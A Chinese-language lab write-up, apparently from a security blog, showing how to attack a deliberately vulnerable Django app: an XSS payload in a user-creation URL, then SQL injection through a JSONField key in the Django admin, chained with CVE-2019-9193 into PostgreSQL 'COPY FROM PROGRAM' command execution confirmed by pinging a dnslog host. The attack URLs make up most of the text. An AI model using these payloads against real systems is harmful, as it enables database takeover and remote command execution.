这是一个有趣的漏洞,首先来到debug页(传送门就是):
构造url创建新用户,同时拼接xss语句,得到已创建的提示:http://[靶场地址]/create_user/?username=<script>alert('haha')</script>
此时再次访问该链接(即创建同一个xss用户),将触发恶意代码:
是不是很怪。
进入网站,直接来到后台页面,用admin账号登陆:
然后访问http://ip:8000/admin/vuln/collection/
页面:
然后在GET参数中构造?detail__a%27b=123
提交,其中detail是模型Collection中的JSONField:
下一步结合CVE-2019-9193(PostgreSQL任意命令执行漏洞)尝试进行命令注入,构造url如下:
ps:CVE-2019-9193:具有数据库服务器文件读取权限的攻击者可以利用此漏洞执行任意系统命令,该漏洞由PostgreSQL 引发。
http://[host]/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcreate table cmd_exec(cmd_output text)--%20
页面结果虽然报错,但是报错原因是no results to fetch,说明我们的语句已经执行.
然后用dnslog检测是否可以执行命令.
http://[host]/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 %3bcopy cmd_exec FROM PROGRAM 'ping q7eds8.dnslog.cn'--%20
成功检测到流量。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
董柯岩
发表于 2021-11-24
附件呢
评论列表
加载数据中...